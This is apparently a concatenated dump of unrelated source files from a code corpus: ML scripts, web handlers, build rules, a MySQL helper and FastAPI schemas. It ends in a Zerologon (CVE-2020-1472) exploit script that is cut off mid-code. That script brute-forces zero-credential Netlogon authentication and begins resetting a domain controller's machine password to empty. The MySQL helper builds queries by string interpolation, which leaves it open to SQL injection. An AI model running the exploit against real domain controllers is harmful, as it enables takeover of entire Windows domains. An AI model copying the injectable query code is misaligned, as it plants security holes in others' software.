news_data.drop(['time',
'sourceTimestamp',
'sourceId'],
axis=1, inplace=True)
mkt_data.drop(['time',
'close',
'open',
'returnsClosePrevMktres1',
'returnsOpenPrevMktres1',
'returnsClosePrevMktres10',
'returnsOpenPrevMktres10'],
axis=1, inplace=True)
# Format time stamp data to numeric epoch time dates
news_data['firstCreated'] = pd.to_datetime(news_data["firstCreated"])
news_data['firstCreated'] = (pd.DataFrame((news_data['firstCreated'] -
pd.Timestamp("1970-01-01")) // pd.Timedelta('1s')))
# Create a list of news_data columns to be processed and scaled
news_headers = list(news_data)
news_process_block = news_headers[15:32]
news_data_list = ['bodySize',
'urgency',
'firstCreated',
'takeSequence',
'sentenceCount',
'companyCount',
'wordCount'] + news_process_block
# Create a list of mkt_data columns to be processed and scaled
mkt_headers = list(mkt_data)
mkt_process_block = mkt_headers[4:8]
mkt_data_list = ['volume'] + mkt_process_block
# IMPLEMENT SCALING/NORMALIZATION OPTIONS:
# Uncomment to implement MinMaxScaler between 0 and 1
# news_data[news_data_list] = scaler1.fit_transform(news_data[news_data_list])
# mkt_data[mkt_data_list] = scaler1.fit_transform(mkt_data[mkt_data_list])
# Uncomment to implement StandardScaler (mean = 0, std = +/-1)
news_data[news_data_list] = scaler0.fit_transform(news_data[news_data_list])
mkt_data[mkt_data_list] = scaler0.fit_transform(mkt_data[mkt_data_list])
return news_data, mkt_data
[processed_news_data, processed_mkt_data] = pre_process_data(news_data, mkt_data)
print(processed_news_data)
print(processed_mkt_data)
| 3.015625 | 3 |
CH10/selective_copy/selective_copy.py | kaifee-haque/Automate-the-Boring-Stuff-Solutions | 0 | 12761488 | #! python3
"""Walks through a folder tree and copies every file with a given extensison
to a new folder."""
import os, sys, shutil
from pathlib import Path
def main(args):
"""Walks through the current working directory and copies files with a given extension."""
for folder, subfolders, files in os.walk(Path.cwd()):
for file in files:
if file[(-1) * len(args[2]):] == args[1]:
if not Path.exists(Path(Path.cwd(), args[2])):
os.mkdir(Path(Path.cwd(), args[2]))
shutil.copy(Path(Path.cwd(), file), Path(Path.cwd(), args[2]))
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: python selective_copy.py <file extension> <new folder>")
print("Example python selective_copy.py .txt text_files")
sys.exit()
else:
main(sys.argv)
| 4.1875 | 4 |
psm.py | armandoblanco/iotedgedemo | 0 | 12761489 | test = 'pablo'
| 1.09375 | 1 |
icecrate/web/tags.py | Artanis/icecrate | 1 | 12761490 | <reponame>Artanis/icecrate
from operator import itemgetter
from pydispatch import dispatcher
import bottle
import icecrate.tags
from icecrate import database
from icecrate import utils
app = bottle.Bottle()
@app.route("/")
@bottle.view("tags_all")
def list_tags():
tags = list(map(icecrate.tags.by_tag_id, icecrate.tags.all_tags()))
print(tags)
tags = sorted(tags, key=itemgetter("name"), reverse=True)
return {"tags": tags}
@app.route("/<tag_id>")
@bottle.view("tags_one.tpl")
def show_tag(tag_id):
taginfo = icecrate.tags.by_tag_id(tag_id)
# get tag members from indexer
members = list(icecrate.search.query("tags:{0}".format(tag_id)))
return {"taginfo": taginfo , "members": members}
| 2.375 | 2 |
src/boringssl/gen_build_yaml.py | kkwell/grpc | 0 | 12761491 | <reponame>kkwell/grpc<gh_stars>0
#!/usr/bin/env python2.7
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import sys
import yaml
run_dir = os.path.dirname(sys.argv[0])
sources_path = os.path.abspath(
os.path.join(run_dir,
'../../third_party/boringssl-with-bazel/sources.json'))
try:
with open(sources_path, 'r') as s:
sources = json.load(s)
except IOError:
sources_path = os.path.abspath(
os.path.join(run_dir,
'../../../../third_party/openssl/boringssl/sources.json'))
with open(sources_path, 'r') as s:
sources = json.load(s)
def map_dir(filename):
return 'third_party/boringssl-with-bazel/' + filename
class Grpc(object):
"""Adapter for boring-SSL json sources files. """
def __init__(self, sources):
self.yaml = None
self.WriteFiles(sources)
def WriteFiles(self, files):
test_binaries = ['ssl_test', 'crypto_test']
self.yaml = {
'#':
'generated with src/boringssl/gen_build_yaml.py',
'raw_boringssl_build_output_for_debugging': {
'files': files,
},
'libs': [
{
'name':
'boringssl',
'build':
'private',
'language':
'c',
'secure':
False,
'src':
sorted(
map_dir(f) for f in files['ssl'] + files['crypto']),
'headers':
sorted(
map_dir(f)
# We want to include files['fips_fragments'], but not build them as objects.
# See https://boringssl-review.googlesource.com/c/boringssl/+/16946
for f in files['ssl_headers'] +
files['ssl_internal_headers'] +
files['crypto_headers'] +
files['crypto_internal_headers'] +
files['fips_fragments']),
'boringssl':
True,
'defaults':
'boringssl',
},
{
'name': 'boringssl_test_util',
'build': 'private',
'language': 'c++',
'secure': False,
'boringssl': True,
'defaults': 'boringssl',
'src': [map_dir(f) for f in sorted(files['test_support'])],
}
],
'targets': [{
'name': 'boringssl_%s' % test,
'build': 'test',
'run': False,
'secure': False,
'language': 'c++',
'src': sorted(map_dir(f) for f in files[test]),
'vs_proj_dir': 'test/boringssl',
'boringssl': True,
'defaults': 'boringssl',
'deps': [
'boringssl_test_util',
'boringssl',
]
} for test in test_binaries],
'tests': [{
'name': 'boringssl_%s' % test,
'args': [],
'exclude_configs': ['asan', 'ubsan'],
'ci_platforms': ['linux', 'mac', 'posix', 'windows'],
'platforms': ['linux', 'mac', 'posix', 'windows'],
'flaky': False,
'gtest': True,
'language': 'c++',
'boringssl': True,
'defaults': 'boringssl',
'cpu_cost': 1.0
} for test in test_binaries]
}
grpc_platform = Grpc(sources)
print(yaml.dump(grpc_platform.yaml))
| 1.992188 | 2 |
lstm_model_train.py | xingkong1983/ai-sentiment-analysis | 0 | 12761492 | import pickle
import numpy as np
import pandas as pd
from keras.utils import np_utils
from keras.utils.vis_utils import plot_model
from keras.models import Sequential
from keras.preprocessing.sequence import pad_sequences
from keras.layers import LSTM, Dense, Embedding, Dropout
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from tensorflow.keras.callbacks import TensorBoard
import time
NAME = 'lstm-{}'.format(int(time.time()))
tensorboard = TensorBoard(log_dir='./logs/{}'.format(NAME))
# 导入数据
# 文件的数据中,特征为evaluation, 类别为label.
def load_data(filepath, input_shape=20):
df = pd.read_csv(filepath)
# 标签及词汇表
labels, vocabulary = list(df['label'].unique()), list(df['CONTENT'].unique())
# 构造字符级别的特征
string = ''
for word in vocabulary:
string += word
vocabulary = set(string)
# 字典列表
word_dictionary = {word: i+1 for i, word in enumerate(vocabulary)}
with open('./data/lstm/word_dict.pk', 'wb') as f:
pickle.dump(word_dictionary, f)
inverse_word_dictionary = {i+1: word for i, word in enumerate(vocabulary)}
label_dictionary = {label: i for i, label in enumerate(labels)}
with open('./data/lstm/label_dict.pk', 'wb') as f:
pickle.dump(label_dictionary, f)
output_dictionary = {i: labels for i, labels in enumerate(labels)}
vocab_size = len(word_dictionary.keys()) # 词汇表大小
label_size = len(label_dictionary.keys()) # 标签类别数量
# 序列填充,按input_shape填充,长度不足的按0补充
x = [[word_dictionary[word] for word in sent] for sent in df['CONTENT']]
x = pad_sequences(maxlen=input_shape, sequences=x, padding='post', value=0)
y = [[label_dictionary[sent]] for sent in df['label']]
y = [np_utils.to_categorical(label, num_classes=label_size) for label in y]
y = np.array([list(_[0]) for _ in y])
return x, y, output_dictionary, vocab_size, label_size, inverse_word_dictionary
# 创建深度学习模型, Embedding + LSTM + Softmax.
def create_LSTM(n_units, input_shape, output_dim, filepath):
x, y, output_dictionary, vocab_size, label_size, inverse_word_dictionary = load_data(filepath)
model = Sequential()
model.add(Embedding(input_dim=vocab_size + 1, output_dim=output_dim,
input_length=input_shape, mask_zero=True))
model.add(LSTM(n_units, input_shape=(x.shape[0], x.shape[1])))
model.add(Dropout(0.2))
model.add(Dense(label_size, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
plot_model(model, to_file='./data/img/model_lstm.png', show_shapes=True)
model.summary()
return model
# 模型训练
def model_train(input_shape, filepath, model_save_path):
# 将数据集分为训练集和测试集,占比为9:1
# input_shape = 100
x, y, output_dictionary, vocab_size, label_size, inverse_word_dictionary = load_data(filepath, input_shape)
train_x, test_x, train_y, test_y = train_test_split(x, y, test_size = 0.1, random_state = 42)
# 模型输入参数,需要自己根据需要调整
n_units = 100
batch_size = 32
epochs = 5
output_dim = 20
# 模型训练
lstm_model = create_LSTM(n_units, input_shape, output_dim, filepath)
lstm_model.fit(train_x, train_y, epochs=epochs, batch_size=batch_size, verbose=1,callbacks=[tensorboard])
# 模型保存
lstm_model.save(model_save_path)
N = test_x.shape[0] # 测试的条数
predict = []
label = []
for start, end in zip(range(0, N, 1), range(1, N+1, 1)):
sentence = [inverse_word_dictionary[i] for i in test_x[start] if i != 0]
y_predict = lstm_model.predict(test_x[start:end])
label_predict = output_dictionary[np.argmax(y_predict[0])]
label_true = output_dictionary[np.argmax(test_y[start:end])]
print(''.join(sentence), label_true, label_predict) # 输出预测结果
predict.append(label_predict)
label.append(label_true)
acc = accuracy_score(predict, label) # 预测准确率
print('模型在测试集上的准确率为: %s.' % acc)
if __name__ == '__main__':
filepath = './data/comment_trainset_2class.csv'
input_shape = 140
model_save_path = './data/lstm/douban_lstm.model'
model_train(input_shape, filepath, model_save_path) | 2.53125 | 3 |
keyboards/__init__.py | jtprog/gendalf_bot | 2 | 12761493 | from . import default
from . import inline
| 1.171875 | 1 |
src/test/views/test_baseview.py | Odin-SMR/odin-api | 0 | 12761494 | <reponame>Odin-SMR/odin-api
from odinapi.views import baseview
import pytest
def test_inspect_predicate():
class T:
def test(self):
pass
assert baseview.inspect_predicate(T.test)
def test_inspect_predicate_on_instance():
class T:
def test(self):
pass
assert baseview.inspect_predicate(T().test)
def test_register_versions():
class T:
@baseview.register_versions('unlucky', ['v42'])
def t(self):
pass
assert T.t._role == 'unlucky'
assert T.t._versions == ['v42']
@pytest.mark.parametrize("role,versions,check_attribute,expect", (
('fetch', ['v42'], 'VERSION_TO_FETCHDATA', {'v42': '_tester'}),
(
'return', None, 'VERSION_TO_RETURNDATA',
{'v4': '_tester', 'v5': '_tester'},
),
('swagger', ['v42'], 'VERSION_TO_SWAGGERSPEC', {'v42': '_tester'}),
))
def test_baseview(role, versions, check_attribute, expect):
class Ultimate(baseview.BaseView):
@baseview.register_versions(role, versions)
def _tester(self):
pass
ult = Ultimate()
assert getattr(ult, check_attribute) == expect
| 2.046875 | 2 |
Submodules/Peano/src/peano/performanceanalysis/merge-log-files.py | annereinarz/ExaHyPE-Workshop-Engine | 2 | 12761495 | import sys
import re
#
# main
#
if len(sys.argv)!=3:
print "Usage: python merge-log-files.py logfilename ranks"
print ""
print "logfilename is the name of the log files without the rank-x- prefix."
print "ranks is the number of ranks you have used for your simulation. If "
print "four MPI ranks have been used and you pass in a log file name of "
print "myfile.log, then the script searches for rank-0-myfile.log, "
print "rank-1-myfile.log, rank-2-myfile.log and rank-3-myfile.log. "
print ""
print "(C) 2015 <NAME>"
quit()
filenameprefix = sys.argv[1]
ranks = int( sys.argv[2] )
print "open fused output file merged-" + filenameprefix
outputFile = open( "merged-" + filenameprefix, "w" )
inputFiles = []
for rank in range(0,ranks):
filename = "rank-" + str(rank) + "-" + filenameprefix
print "read " + filename
with open(filename) as f:
inputFiles.append( f.readlines() )
print "read in all " + str(len(inputFiles)) + " input files"
timeStamp = 0
while timeStamp<sys.float_info.max:
timeStamp = sys.float_info.max
rankWithSmallestTimeStamp = 0
for rank in range(0,ranks):
searchPattern = "([0-9]\.?[0-9]*).*"
if len(inputFiles[rank])>0:
firstLineInCurrentFile = inputFiles[rank][0]
m = re.search( searchPattern, firstLineInCurrentFile )
if (m):
currentTimeStamp = float(m.group(1))
if currentTimeStamp < timeStamp:
timeStamp = currentTimeStamp
rankWithSmallestTimeStamp = rank
else:
print "ERROR: line in " + str(rank) + "th intput file does not hold time stamp. Line " + firstLineInCurrentFile
if timeStamp<sys.float_info.max:
print "- t=" + "%.4e"%(timeStamp) + ": take message from rank " + str( rankWithSmallestTimeStamp )
outputFile.write( inputFiles[rankWithSmallestTimeStamp][0] )
inputFiles[rankWithSmallestTimeStamp].pop(0)
| 2.953125 | 3 |
frankfurt/Server/Models/MySQLdb_WITH_CONN_POOL.py | fcgtyg/SEAS | 1 | 12761496 | # -*-coding:utf-8-*-
from DBTable import DBTable
from mysql.connector import pooling, InterfaceError, OperationalError
from Password import Password
class MySQLdb:
def __init__(self, db_name, user="root", password="<PASSWORD>"):
self.name = db_name
self.allowed_extensions = {'png', 'jpg', 'jpeg'}
db_config = {
"pool_name": "conn",
"database": db_name,
"user": user,
"password": password,
"host": '172.16.31.10',
"port": 3306,
"pool_size": 1}
self.pool = pooling.MySQLConnectionPool(**db_config)
self.db = None
self.cursor = None
def __enter__(self):
self.db = self.pool.get_connection()
self.cursor = self.db.cursor(buffered=True)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
try:
self.db.close()
self.db = None
self.cursor = None
except OperationalError:
pass
def initialize_organization(self, organization):
# Create Database for organization
self.execute(
"CREATE SCHEMA %s;" % organization
)
# Set active database and Enable Event Scheduler
self.execute(
"USE %s; "
"SET GLOBAL event_scheduler = ON;" % organization
)
# Role Table
DBTable("roles", [
("Role", "varchar(20)", ""),
("roleID", "INT", "AUTO_INCREMENT")],
uniques=[("Role")],
primary_key="RoleID",
database=self)
# Initialize Roles
self.execute("Insert into roles(Role) values ('superuser'), ('admin'), ('lecturer'), ('student');")
# Members Table
DBTable("members", [
("PersonID", "int", "not null"),
("Role", "int", "not null"),
("Name", "varchar(255)", "not null"),
("Surname", "varchar(255)", "not null"),
("Username", "varchar(255)", "not null"),
("Password", "varchar(255)", "not null"),
("Email", "varchar(50)", "not null"),
("Department", "varchar(255)", ""),
("ProfilePic", "varchar(255)", "")],
primary_key="PersonID",
foreign_keys_tuple=[("Role", "roles", "RoleID", "")],
uniques=[("Name", "Surname", "Username"), ("Username")],
database=self)
# Courses Table
DBTable("courses", [
("CourseID", "int", "not null auto_increment"),
("Name", "varchar(255)", "not null"),
("Code", "varchar(20)", "not null"),
("isActive", "boolean", "default true")],
primary_key="CourseID",
uniques=[("Name", "Code", "isActive")],
indexes=[("Code")],
database=self)
# Registrations Table
DBTable("registrations", [
("StudentID", "int", "not null"),
("CourseID", "int", "not null"),
("RegistrationID", "int", "auto_increment")],
foreign_keys_tuple=[
("StudentID", "members", "PersonID", "on delete cascade"),
("courseID", "courses", "CourseID", "on delete cascade")],
uniques=[
("StudentID", "CourseID")],
primary_key="RegistrationID",
database=self)
# Lecturers Table
DBTable("lecturers", [
("LecturerID", "int", "not null"),
("CourseID", "int", "not null"),
("LeCorID", "int", "not null auto_increment")],
foreign_keys_tuple=[
("LecturerID", "members", "PersonID", "on delete cascade"),
("CourseID", "courses", "CourseID", "on delete cascade")],
primary_key="LeCorID",
uniques=[
("LecturerID, CourseID")],
database=self)
# Exams Table
DBTable("exams", [
("ExamID", "int", "auto_increment"),
("Name", "varchar(255)", "not null"),
("CourseID", "int", ""),
("Time", "Varchar(50)", "not null"),
("Duration", "int", "not null"),
("Status", "varchar(20)", "not null Default 'draft'")],
primary_key="ExamID",
foreign_keys_tuple=[
("CourseID", "courses", "CourseID", "on delete set null")],
uniques=[
("Name"),
("Name", "Time")],
database=self)
# Questions Table
DBTable("questions", [
("QuestionID", "int", "auto_increment"),
("ExamID", "int", ""),
("info", "JSON", "")],
primary_key="QuestionID",
foreign_keys_tuple=[
("ExamID", "exams", "ExamID", "on delete set null")],
database=self)
# Answers Table
DBTable("answers", [
("answerID", "int", "auto_increment"),
("questionID", "int", "not null"),
("studentID", "int", "not null"),
("answer", "JSON", ""),
("grade", "int", "")],
primary_key="answerID",
foreign_keys_tuple=[
("questionID", "questions", "questionID", "on delete cascade"),
("studentID", "members", "PersonID", "on delete cascade")],
uniques=[
("questionID", "studentID")],
database=self)
# Temporary Passwords Table
DBTable("temporary_passwords", [
("UserID", "int", ""),
("Password", "<PASSWORD>)", "not null")],
primary_key="UserID",
foreign_keys_tuple=[
("UserID", "members", "PersonID", "on delete cascade")],
database=self)
return "Done"
def get_organization(self):
return self.execute("Select * from istanbul_sehir_university.members")
def sign_up_user(self, organization, request):
passwd = Password().hash_password(request.form["Password"])
username = request.form["Username"]
role = request.form["Role"].lower()
command = "Insert into %s.members(PersonID, Role, Name, Surname, Username, Password, Email, Department) " \
"values(%s, '%d', '%s', '%s', '%s', '%s', '%s', '%s')" \
% (organization,
request.form["ID"],
int(self.execute("SELECT RoleID FROM %s.roles WHERE Role = '%s'" % (
organization, role))[0][0]),
request.form["Name"],
request.form["Surname"],
username,
passwd,
request.form["Email"],
request.form["Department"]
)
return self.execute(command)
def if_token_revoked(self, token):
try:
result = self.execute("select token from main.revoked_tokens where token = '%s'" % token)
return len(result) > 0
except InterfaceError:
return False
except TypeError:
return False
def revoke_token(self, token):
return self.execute("INSERT INTO main.revoked_tokens (token) VALUES ('%s');" % token)
def log_activity(self, username, ip, endpoint, desc=None):
if desc is None:
self.execute(
"INSERT INTO last_activities(Username, IP, Api_Endpoint) VALUES ('%s', '%s', '%s');"
% (username, ip, endpoint))
else:
self.execute(
"INSERT INTO last_activities(Username, IP, Api_Endpoint, Description) VALUES ('%s', '%s', '%s', '%s');"
% (username, ip, endpoint, desc))
def execute(self, command):
try:
self.cursor.execute(command)
except InterfaceError:
self.cursor.execute(command, multi=True)
if command.lower().startswith("select") or command.lower().startswith("(select"):
rtn = self.cursor.fetchall()
self.__commit()
return rtn
try:
self.__commit()
except InterfaceError:
for result in self.db.cmd_query_iter(command):
print "cmd_query_iter: ", result
self.__commit()
return None
# try:
# rtn = self.cursor.fetchall()
# except InterfaceError:
# print "Interface error 2"
# rtn = None
# self.__commit()
# return rtn
def __commit(self):
return self.db.commit()
| 2.5625 | 3 |
closure/buildozer_http_archive.bzl | mirandacong/rules_proto | 0 | 12761497 |
load("@bazel_tools//tools/build_defs/repo:utils.bzl", "workspace_and_buildfile")
def _http_archive_impl(ctx):
"""Buildozer implementation of the http_archive rule."""
if not ctx.attr.url and not ctx.attr.urls:
fail("At least one of url and urls must be provided")
if ctx.attr.build_file and ctx.attr.build_file_content:
fail("Only one of build_file and build_file_content can be provided.")
all_urls = []
if ctx.attr.urls:
all_urls = ctx.attr.urls
if ctx.attr.url:
all_urls = [ctx.attr.url] + all_urls
ctx.download_and_extract(
all_urls,
"",
ctx.attr.sha256,
ctx.attr.type,
ctx.attr.strip_prefix,
)
if ctx.os.name == "mac os x":
buildozer_urls = [ctx.attr.buildozer_mac_url]
buildozer_sha256 = ctx.attr.buildozer_mac_sha256
else:
buildozer_urls = [ctx.attr.buildozer_linux_url]
buildozer_sha256 = ctx.attr.buildozer_linux_sha256
ctx.download(
buildozer_urls,
output = "buildozer",
sha256 = buildozer_sha256,
executable = True,
)
if ctx.attr.label_list:
args = ["./buildozer", "-root_dir", ctx.path(".")]
args += ["replace deps %s %s" % (k, v) for k, v in ctx.attr.replace_deps.items()]
args += ctx.attr.label_list
result = ctx.execute(args, quiet = False)
if result.return_code:
fail("Buildozer failed: %s" % result.stderr)
if ctx.attr.sed_replacements:
sed = ctx.which("sed")
if not sed:
fail("sed utility not found")
# For each file (dict key) in the target list...
for filename, replacements in ctx.attr.sed_replacements.items():
# And each sed replacement to make (dict value)...
for replacement in replacements:
args = [sed, "-i.bak", replacement, filename]
# execute the replace on that file.
result = ctx.execute(args, quiet = False)
if result.return_code:
fail("Buildozer failed: %s" % result.stderr)
workspace_and_buildfile(ctx)
_http_archive_attrs = {
"url": attr.string(),
"urls": attr.string_list(),
"sha256": attr.string(),
"strip_prefix": attr.string(),
"type": attr.string(),
"build_file": attr.label(allow_single_file = True),
"build_file_content": attr.string(),
"replace_deps": attr.string_dict(),
"sed_replacements": attr.string_list_dict(),
"label_list": attr.string_list(),
"workspace_file": attr.label(allow_single_file = True),
"workspace_file_content": attr.string(),
"buildozer_linux_url": attr.string(
default = "https://github.com/bazelbuild/buildtools/releases/download/0.15.0/buildozer",
),
"buildozer_linux_sha256": attr.string(
default = "be07a37307759c68696c989058b3446390dd6e8aa6fdca6f44f04ae3c37212c5",
),
"buildozer_mac_url": attr.string(
default = "https://github.com/bazelbuild/buildtools/releases/download/0.15.0/buildozer.osx",
),
"buildozer_mac_sha256": attr.string(
default = "294357ff92e7bb36c62f964ecb90e935312671f5a41a7a9f2d77d8d0d4bd217d",
),
}
buildozer_http_archive = repository_rule(
implementation = _http_archive_impl,
attrs = _http_archive_attrs,
)
"""
http_archive implementation that applies buildozer and sed replacements in the
downloaded archive.
Refer to documentation of the typical the http_archive rule in http.bzl. This
rule lacks the patch functionality of the original.
Following download and extraction of the archive, this rule will:
1. Execute a single buildozer command.
2. Execute a list of sed commands.
The buildozer command is constructed from the `replace_deps` and `label_list`
attributes. For each A -> B mapping in the replace_deps dict, a command like
'replace deps A B' will be appended. The list of labels to match are taken from
the label_list attribute. Refer to buildozer documentation for an explanation
of the replace deps command.
The sed commands are constructed from the `sed_replacements` attribute. These
sed commands might not be necessary if buildozer was capable of replacement
within *.bzl files, but currently it cannot. This attribute is a
string_list_dict, meaning the dict keys are filename to modify (in place), and
each dict value is are list of sed commands to apply onto that file. The value
typically looks something like 's|A|B|g'.
"""
| 2.140625 | 2 |
src/adobe/pdfservices/operation/internal/api/dto/document.py | hvntravel/pdfservices-python-sdk | 2 | 12761498 | # Copyright 2021 Adobe. All rights reserved.
# This file is licensed to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy
# of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
class Document:
json_hint = {
'dc_format' : 'dc:format',
'location' : 'cpf:location',
}
def __init__(self, file_format= None, location= None):
self.dc_format = file_format
self.location = location
| 2.171875 | 2 |
src/BackgroundSet.py | kwal0203/data_generator | 0 | 12761499 | import os
from src.Background import Background
from PIL import Image
# Class that represents the whole set of background images in the application
class BackgroundSet:
def __init__(self, directory):
self.directory = directory
self.number_of_backgrounds = 0
self.background_images = []
def make_background_set(self):
for filename in os.listdir(self.directory):
image_path = self.directory + filename
open_image = Background(filename, Image.open(image_path, 'r'))
self.background_images.append(open_image)
self.number_of_backgrounds += 1
| 3.328125 | 3 |
retinanet/dataloader_style.py | JulesSanchez/pytorch-retinanet | 1 | 12761500 | <reponame>JulesSanchez/pytorch-retinanet
import torch
from torch.utils import data
import numpy as np
class StyleDataset(data.Dataset):
def __init__(self,train_data,train_labels):
self.train_data = train_data
self.train_labels = train_labels
def __getitem__(self,index):
data, label = self.train_data[index], self.train_labels[index]
label = torch.from_numpy(np.array(label))
return data, label
def __len__(self):
return len(self.train_data)
| 2.5625 | 3 |
src/airfly/_vendor/airflow/contrib/operators/gcp_text_to_speech_operator.py | ryanchao2012/airfly | 7 | 12761501 | <reponame>ryanchao2012/airfly<filename>src/airfly/_vendor/airflow/contrib/operators/gcp_text_to_speech_operator.py
# Auto generated by 'inv collect-airflow'
from airfly._vendor.airflow.providers.google.cloud.operators.text_to_speech import (
CloudTextToSpeechSynthesizeOperator,
)
class GcpTextToSpeechSynthesizeOperator(CloudTextToSpeechSynthesizeOperator):
pass
| 1.46875 | 1 |
setup.py | Atharva-Gundawar/Commit-Man | 0 | 12761502 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import io
import os
import sys
from setuptools import find_packages, setup, Command
# Package meta-data.
NAME = 'Commit-Man'
DESCRIPTION = 'Official Commit man python package'
URL = 'https://github.com/atharva-Gundawar/commit-man'
EMAIL = '<EMAIL>'
AUTHOR = '<NAME>'
REQUIRES_PYTHON = '>=3.6.0'
VERSION = '0.0.3'
REQUIRED = [
"datetime", "gitignore_parser", "docopt"
]
here = os.path.abspath(os.path.dirname(__file__))
try:
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
except FileNotFoundError:
long_description = DESCRIPTION
# Load the package's __version__.py module as a dictionary.
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=long_description,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(),
# package_dir={'simplepipreqs':
# 'simplepipreqs'},
entry_points ={
'console_scripts': [
'cm = src.main:main'
]
},
include_package_data=True,
install_requires=REQUIRED,
keywords = 'git commit version-control-system vcs',
zip_safe = False,
license='MIT',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
"Operating System :: OS Independent",
]
) | 1.679688 | 2 |
app_folder/schemas/user.py | Nuznhy/day-f-hack | 0 | 12761503 | <reponame>Nuznhy/day-f-hack
import uuid
from datetime import datetime
import re
from fastapi.responses import JSONResponse
from pydantic import BaseModel, ValidationError, validator, Field
from typing import Optional
class UserBase(BaseModel):
email: str
class UserLoginIn(UserBase):
password: str
class Config:
schema_extra = {
'example': {
'email': 'email',
'password': 'password'
}
}
class Token(BaseModel):
access_token: str
token_type: str
success: bool
class TokenData(BaseModel):
email: Optional[str] = None
class UserRegisterIn(BaseModel):
email: str
username: str
password: str
job: str
first_name: Optional[str]
last_name: Optional[str]
image: Optional[str]
@validator('username')
def check_username(cls, value: str):
if ' ' in value:
raise ValueError('must not have spaces')
return value
@validator('password')
def validate_password(cls, value: str):
if not re.fullmatch(r'[A-Za-z0-9]{8,64}', value):
raise ValueError('password must has at least 8 symbols, number and capital')
return value
@validator('email')
def validate_email(cls, value: str):
if ' ' in value or '@' not in value:
raise ValueError('not valid email')
return value
class UserRegisterOut(BaseModel):
success: bool
access_token: str
token_type: str
class Config:
schema_extra = {
'example': {
'success': True,
'access_token': 'token',
'token_type': 'Bearer',
}
}
class UserDataOut(BaseModel):
id: int
username: str
email: str
job: str
first_name: Optional[str] = None
last_name: Optional[str] = None
image: Optional[str] = None
registration_date: float
class Config:
schema_extra = {
'example': {
'username': 'username',
'password': 'password',
'job': 'student',
'first_name': 'Name',
'last_name': 'Surname',
'image': 'data:image/png;base64,blalblalba',
'registration_date:': 'int'
}
}
class FailResponse(BaseModel):
success: bool
message: str
| 2.5625 | 3 |
zerologon_tester.py | tothi/CVE-2020-1472 | 4 | 12761504 | <filename>zerologon_tester.py
#!/usr/bin/env python3
from impacket.dcerpc.v5 import nrpc, epm
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport
from impacket import crypto
import hmac, hashlib, struct, sys, socket, time
from binascii import hexlify, unhexlify
from subprocess import check_call
from termcolor import colored, cprint
# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average.
MAX_ATTEMPTS = 2000 # False negative chance: 0.04%
def fail(msg):
print(msg, file=sys.stderr)
print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
sys.exit(2)
def try_zero_authenticate(dc_handle, dc_ip, target_computer):
# Connect to the DC's Netlogon service.
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
# Use an all-zero challenge and credential.
plaintext = b'\x00' * 8
ciphertext = b'\x00' * 8
# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
flags = 0x212fffff
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
target_computer + '\x00', ciphertext, flags
)
# It worked!
assert server_auth['ErrorCode'] == 0
return rpc_con
except nrpc.DCERPCSessionError as ex:
# Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
if ex.get_error_code() == 0xc0000022:
return None
else:
fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
except BaseException as ex:
fail(f'Unexpected error: {ex}.')
def perform_attack(dc_handle, dc_ip, target_computer):
# Keep authenticating until succesfull. Expected average number of attempts needed: 256.
print('Performing authentication attempts...')
rpc_con = None
for attempt in range(0, MAX_ATTEMPTS):
rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
if rpc_con == None:
print('=', end='', flush=True)
else:
break
if rpc_con:
print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
print('Trying to set empty password for DC computer password.')
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81
# use latest impacket: credits goes to @_dirkjan https://github.com/SecureAuthCorp/impacket/pull/951
nrpc_Authenticator = nrpc.NETLOGON_AUTHENTICATOR()
nrpc_Authenticator["Credential"] = b'\x00' * 8 # same as ciphertext
nrpc_Authenticator["Timestamp"] = 0
nrpc_Password = nrpc.NL_TRUST_PASSWORD()
nrpc_Password['Buffer'] = b'\x00' * 516
nrpc_Password['Length'] = '\x00' * 4
